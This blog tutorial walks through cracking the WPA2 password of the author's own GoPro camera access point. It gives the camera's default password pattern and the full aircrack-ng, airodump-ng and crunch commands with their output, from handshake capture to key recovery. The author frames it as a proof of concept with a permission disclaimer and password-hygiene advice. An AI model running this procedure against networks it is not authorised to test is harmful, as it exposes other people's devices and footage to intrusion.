Hacking a GoPro WiFi Access Point

d3adr1nger

Thanos Stantzouris

Posted on December 28, 2020

Hacking a GoPro WiFi Access Point

In this article, I am going to give to you the entire process of Hacking a GoPro Silver 7 (Which I own). Why? Why not? I say.
Every hacking adventure is an adventure full of practice and fun techniques in action, every time you try to hack or crack a device you get to learn something new and gain only pure XP (Experience Points) on the matter.

The History behind the Hack

It was a plain classic Friday, and I was on a hacker's high, I just wanted to find something interesting to do, I start gazing around my room when suddenly out of nowhere there it was, my GoPro Silver 7, standing alone exactly at the same place it was 4 months ago. It was waiting for me, like a loyal Labrador Retriever... Quiet touching... Quiet touching indeed... And then the idea hit me! I am gonna hack this shit.
I grab my Wireless Adapter I fire up my laptop, open up my Kali virtual box, then I grab my phone, start scrolling down Reddit, see a cute puppy, then I get on a conversation about the last season of Silicon Valley, 2 hours passed by like a breeze and then I remembered.
Wasn't I suppose to be hacking My GoPro? hehe... πŸ˜‚

So I got back to Work!

TL;DR: I am going to be cracking my GoPro's built-in Wireless Network and find the Password with the help of:

Disclaimer: All the Hacking in this Article took place on devices that I own. Do not hack other people unless you have their WRITTEN Permissions! Ok, that is out of the way now.

1. Reconnaisance

Like it or not when you embark on a new hacking adventure you always need to scribble down some notes first.
Whatever you may believe that it can be proven useful along the way.

My Notes:

  • GoPro Model: Silver 7 GoPro
  • Name: StantzGoPro GoPro
  • Password Type: WPA2 GoPro
  • Password: myGoPro123

And then it hit me. My password is weaker than freaking SpongeBob! But why? I always put super complicated passwords that even I do not remember. Why did I commit this Security crime? The answer is simple, boredom, and ignorance. 😁
So I reset the network settings and the new info I got was:

  • GoPro Default Name: GP24514525
  • GoPro Default Password: Zp2-4Vy-cBp

Ok, that's a random password but that dash (-) on the 4th and 8th password slot may not be that random. So I reset the wireless options 29 more times!

The results:

  • GoPro Silver 7 has a random wpa2 generated password on every reset with a form of 11 characters with mixed alphanumerics and ALWAYS has dashes on the 4th and 8th slot. @@@-@@@-@@@ β¬… Like This.
  • The Dash NEVER changes position.
  • There was no occurrence of two numbers side by side (22g) β¬… This never happened, (63f) β¬… This never happened, (281) β¬… This never happened.
  • There was no occurrence of three same letters side by side. (mmm) β¬… This never happened.

That is a pretty scary password still, even if you put all the rules in the equation! But where there is a pattern, there is a case.

Did you know that you can rent an Nvidia Tesla K80β€Šβ€”β€Ša GPU with 4992 cores from AWS for 0.90$/hour? You can run Hashcat on that thing and try 3 trillion hashes per hour.
Size matters...

But you know what? I know that this Default GoPro password is strong and I still changed it! Do you want to know why? Because I have one camera but many other devices, I want the password to be an easy one to remember as I want to put it on my phone, and on my Laptop, and on my Desktop, and on my Smart Fridge, I don't know.
Imagine having to put Zp2-4Vy-cBp every time. And also! Who would hack my GoPro man? That is so random! So why the strong password? I bet that this was my train of thought back then when I bought it and set it up for the first time.

Ok, I think that's enough Recon for this hack. Let's proceed to network scanning to Find our target.

2. Locking Network Target with Airckrack-ng and grabbing 4-way handshake

That's the cool part of the hacking adventure! Let's fire up the good ol' Kali Linux VM and connect the Wireless Card!
I use this baby for this hack: Tp-Link (TL-WN722N) Wireless Adapter.

When everything is connected run iwconfig on a terminal for a status check.

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off 
Enter fullscreen mode Exit fullscreen mode

If you get this result then everything is all fine and dandy as the British say. (I googled that).

Now the wireless card mode needs to change from managed to monitor. This is a crucial part. I bought this wireless card because I knew that it could work like a champ! But now TP-LINK has updated the versions and some new TL-WN722N cards don't work so...

You should buy an Alpha Card just to be sure. Alfa AWUS036NHA High Gain Wireless Adapter,
This one is my favorite because it just works like a charm!

Putting the card to monitor mode

root@kali:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    476 NetworkManager
    941 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       ath9k_htc   Qualcomm Atheros Communications AR9271 802.11n

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)
Enter fullscreen mode Exit fullscreen mode

Next step, sniffing out for networks with Airodump-ng

root@kali:~# airodump-ng wlan0mon 

CH 2 ][ Elapsed: 3 mins ][ 2020-11-12 15:51 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 06:41:69:94:C5:8D -26 13      0        0    0   11   65  WPA2 CCMP   PSK  GP24514525 
 **:**:**:**:**:**  -87        2        0    0   1  270   WPA2 CCMP   PSK  C******-**2591               
 **:**:**:**:**:**  -46       13      211    0   2  270   WPA  CCMP   PSK  H*****n                   
 **:**:**:**:**:**  -59        6        0    0   1  130   WPA2 CCMP   PSK  C*****A                     
 **:**:**:**:**:**  -66        7        9    0  11  130   WPA2 CCMP   PSK  *****le*    
 **:**:**:**:**:**  -77        3        1    0   1   65   WPA2 CCMP   PSK  CY*****B                     
 **:**:**:**:**:**  -80        2        0    0   7  270   OPN              CO*******n             
 **:**:**:**:**:**  -80        3        0    0   7  270   WPA2 CCMP   PSK  ******4403001               
 **:**:**:**:**:**  -80        4        0    0   8  130   WPA2 CCMP   PSK  W*****522                
 **:**:**:**:**:**  -78        3        0    0   7  130   WPA2 CCMP   PSK  ****D_BF2EF0                  
 **:**:**:**:**:**  -88        4        0    0  13  130   WPA2 CCMP   PSK  ****CVDW-982
Enter fullscreen mode Exit fullscreen mode

These results represent all the networks that surround my wireless card, and I am only interested in the first one, which represents the Wi-Fi Network of my GoPro.
I put stars on the BSSIDs as the greatest of Lads of Reddit noted that People who are good with OSINT Techniques can locate people with Wigle.
HOW COOL AND SCARY IS THAT. πŸ±β€πŸ’»πŸ±β€πŸ‘€

If I hadn't reset my GoPro then under the ESSID column you would see a StantzGoPro. A dead give away of the kind of the device.
A bit of detail here:

  • BSSID: 06:41:69:94:C5:8D
  • CH (channel): 11
  • ENC: WPA2
  • ESSID:GP24514525

These few details you should always write down. They keep on finding their way on future commands, like the next one:

airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro
Enter fullscreen mode Exit fullscreen mode

With this command we order our wireless card to only listen to a specific channel and to a specific device, and also write down every result it may capture on Desktop/WPA_Hacks/goPro/gopro.

By doing this we are trying to capture the 4-Way Handshake between a device and the GoPro WiFi.

root@kali:~# airodump-ng --bssid 06:41:69:94:C5:8D -c 11 wlan0mon -w Desktop/WPA_Hacks/goPro/goPro 

CH 11 ][ Elapsed: 48 s ][ 2020-11-12 16:00 ][ WPA handshake: 06:41:69:94:C5:8D 

 BSSID              PWR  RXQ  Beacons #Data, #/s  CH  MB  ENC  CIPHER AUTH  ESSID 
 06:41:69:94:C5:8D  -20  36   77      4      0    11  65  WPA2 CCMP   PSK   GP24514525 

 BSSID              STATION            PWR  Rate    Lost  Frames   Notes   Probes 
 06:41:69:94:C5:8D  42:E7:EC:D6:05:DE  -14  1e- 1e  0     5724     EAPOL   GP24514525
Enter fullscreen mode Exit fullscreen mode

To capture a Handshake a user has to be online and interacting with the camera, which is really possible because if you find a GoPro Network somewhere around, it means that someone has to be either connected or about to connect.
If a GoPro is off, then its Wi-Fi is not broadcasting. Simple as that.

Once you capture the Handshake the only thing that remains is the Handshake cracking!

Carving the Dictionary

Now that we have the password hidden and encrypted we need a smart Dictionary to find the Password.
We'll be using the tool Crunch to create a smart Dictionary.

Crunch is a Wordlist generator tool that is coming pre-installed with Kali Linux out of the box. Mastering this tool is of the essence when you wish to crack a Hashed Password.
You could always go the Bruteforcing way but you should always leave that technique as a hail mary.

Based on what I realized about the GoPro password I could Generate a Wordlist that would most definitely contain the password with this command:

root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt
Enter fullscreen mode Exit fullscreen mode

This command tells crunch to:

  • 11 11: Create an Eleven character long string.
  • -t: Specifies a pattern, eg: @@god@@@@ where only the @'s, ,'s, %'s, and ^'s will change. So everything except the ( - ) will change.
  • -d 2@ -d 1%: Limit the number of duplication you want to get in your password. Ex, Let aa happen but no aaa, and 11 will never happen.
  • -f: Using a charset for the generated password. Because we want the possible characters to be both lowercase and Uppercase and we also want numbers in there then we have to go with mixalpha-numeric.
  • -o: Save the output to wordlist.txt on the Desktop directory.

These parameters with crunch would create a Dictionary containing our target's password. But there is a slight, little, tiny problem...

root@kali:~# crunch 11 11 -t @@@-@@@-@@@ -d 2@ -d 1% -f /usr/share/rainbowcrack/charset.txt mixalpha-numeric -o Desktop/wordlist.txt
Crunch will now generate the following amount of data: 162318293407261152 bytes
154798787505 MB
151170690 GB
147627 TB
144 PB
Crunch will now generate the following number of lines: 13526524450605096 
Enter fullscreen mode Exit fullscreen mode

The output would be H U G E. 🀯

But for the sake of the Proof of Concept (PoC) let's demonstrate the Dictionary attack.

Note to the future: If you are watching this in 2030, 144 PB was a lot of Data back in the Covid Crisis! So Good for you! You can crack wpa2 passwords easily! Congrats πŸŽ‰πŸ₯‚

If we go through with Crunch we would eventually have a list like the following in our hands.

zp2-4vy-cBp
2r6-cnj-Xky 
w4f-ceb-DC2 
gbs-24d-cas 
23H-wec-dv3 
P6C-PRt-hrK 
Yn9-Cr6-Ybm 
s5p-WWN-6n2 
HSM-v4Q-khn 
CCW-VkJ-FuJ 
Pub-bMw-chn 
9vm-WJN-Vf3 
9vm-wjn-Vf3 
9vm-wJn-Vf3 
9vm-wjN-Vf3 
9vm-wJN-Vf3 
9vm-Wjn-Vf3 
wrj-hD5-4hZ 
k6Z-wjz-mtS 
3nk-Ncj-cf9 
Rnk-PRt-h1k
Enter fullscreen mode Exit fullscreen mode

Let's use this Dictionary to prove a point

The Dictionary attack The Aircrack-ng command for the attack and the results are:

root@kali:~# aircrack-ng Desktop/WPA_Hacks/goPro/goPro-01.cap -w Desktop/gopro.txt
Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.

   #  BSSID              ESSID                     Encryption

   1  06:41:69:94:C5:8D  GP24514525                WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening Desktop/WPA_Hacks/goPro/goPro-01.cap
Read 20985 packets.

1 potential targets



                               Aircrack-ng 1.6 

      [00:00:00] 19/21 keys tested (940.87 k/s) 

      Time left: 0 seconds                                      90.48%

                          KEY FOUND! [ 9vm-WJN-Vf3 ]


      Master Key     : DD 1D A3 87 9C D5 DF A5 A9 77 D5 EC 35 D4 C6 C3 
                       03 1D F9 4E 6E 03 90 92 41 40 BA 4E FE 2A 92 72 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : C1 BF EF A3 22 02 9F 4B 19 4C 1B 9C B6 0D EA 1A 
Enter fullscreen mode Exit fullscreen mode

Dope feeling man. Dope the least.

4. Bonus! Wordlist Creation

Ok, everything went perfectly thus far. But what would have happened if instead of GP24514525 the name was StantzGoPro?
That takes us to an entirely different way of approaching this Dictionary thing.
What I am thinking is "Since he has changed the name, there is NO way in hell that he left that ugly password as default. NO way!

Here is a thought, he didn't entirely change the name. He kept the word "GoPro" inside so he may use it again in his password. and GoPro is 5 letters, and an acceptable wpa2 password is 8 characters. Good.

Let's build a cool Dictionary to hack StantzGoPro

*Simple Wordlist:

crunch 14 14 -t StantzGoPro%%% goPro-simple-wl.txt
Enter fullscreen mode Exit fullscreen mode

This command will create for you a list starting from StantzGoPro000 and finish at StantzGoPro999.

Pretty simple but powerful if you work with it more. As I said earlier Crunch is a must. Password cracking is not easy, but is Hacking easy? πŸ€“

Conclusion

Cracking a GoPro password is totally possible, and you can probably understand the danger and how it can expose all the images and 4k videos stored in the camera to people with malicious intent. Keep your Passwords strong. And store them in a password manager like LastPass. It will make your life easier and hackers' lives a lot more difficult.
Password cracking is an art, it needs attention to detail, a critical way of thinking, and most definitely some good, old fashioned trial and error sprinkled with some dazzling patience.

There are many roads to take and many more books to read. I created this Article - Tutorial - PoC or however you like to call it just to give out something new to the community. I will create a more in-depth article about password cracking and much more real-life hacking PoCs like this one including Phishing, more Wi-Fi hacking, and pretty much whatever spikes my interest at that point. If what you just read feels a bit... advanced, you should also take a look at my other articles on my blog Sudorealm:

β˜• Support this Nerd

πŸ’– πŸ’ͺ πŸ™… 🚩
d3adr1nger
Thanos Stantzouris

Posted on December 28, 2020

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related